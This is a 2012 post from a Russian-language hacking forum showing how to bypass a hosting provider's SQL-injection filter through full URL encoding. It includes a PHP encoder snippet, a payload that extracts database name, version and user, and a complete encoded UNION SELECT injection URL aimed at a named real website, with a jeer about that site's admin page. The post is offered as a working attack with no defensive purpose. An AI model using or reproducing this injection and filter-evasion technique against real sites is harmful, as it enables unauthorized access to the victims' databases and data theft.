16.01.2012, 16:08
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Защита от peterhost.
Фильтр выглядит как-то так приблизительно:
/union(.*)select/ is
Т.е. срабатывает даже union.php?select =)) не говоря уже о union%0Aselect и т.п. примерам.
Однако это все равно легко обходится «полным» url кодированием.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"' union select"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]//$_GET['s'];
[/COLOR][COLOR="#007700"]foreach([/COLOR][COLOR="#0000BB"]str_split[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]) AS[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"])
print[/COLOR][COLOR="#DD0000"]'%'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]bin2hex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
concat_ws(0x3a,database(),version(),user())
Код:
www.fotodi.ru/books-text.php?id=224%27%20%61%6e%64%20%31%3d%33%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%63%6f%6e%63%61%74%5f%77%73%28%30%78%33%61%2c%64%61%74%61%62%61%73%65%28%29%2c%75%73%65%72%28%29%2c%76%65%72%73%69%6f%6e%28%29%29%2c%39%20%2d%2d%20%31
P.S http://www.fotodi.ru/admin/ Жмакаем «Отмена». Я ржал.
|
|
|